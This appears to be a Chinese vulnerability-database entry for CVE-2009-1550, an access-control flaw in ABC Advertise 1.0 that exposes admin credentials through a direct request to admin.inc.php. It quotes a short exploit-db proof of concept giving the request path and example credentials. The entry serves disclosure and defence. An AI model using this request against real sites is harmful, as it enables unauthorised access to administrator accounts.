Zakkis Technology ABC Advertise 'admin.inc.php'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117649 漏洞类型 权限许可和访问控制
发布时间 2009-04-27 更新时间 2009-05-06
CVE编号 CVE-2009-1550 CNNVD-ID CNNVD-200905-064
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/8555
https://www.securityfocus.com/bid/79539
https://cxsecurity.com/issue/WLB-2009050115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-064
|漏洞详情
ABCAdvertise是一个基于WEB在线广告管理脚本。ZakkisTechnologyABCAdvertise1.0版本没有适当地限制对admin.inc.php的访问,这会允许远程攻击者可以借助提交一个直接请求,获得管理员登陆名和密码。
|漏洞EXP
homepage : http://www.zakkis.ca./index.php?p=39
 
##############################################################
[+] ABC Advertise 1.0 Admin Data Disclosure
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
##############################################################
[+] Admin Data Disclosure
 
   - Go to
 
    http://127.0.0.1/[path]/admin.inc.php
 
   - You will find there the admin username and password.
 
   Example : login=admin pass=admin
 
##############################################################

# milw0rm.com [2009-04-27]
|受影响的产品
Zakkis Abc Advertise 1.0
|参考资料

来源:XF
名称:abcadvertise-admininc-info-disclosure(50183)
链接:http://xforce.iss.net/xforce/xfdb/50183
来源:MILW0RM
名称:8555
链接:http://www.milw0rm.com/exploits/8555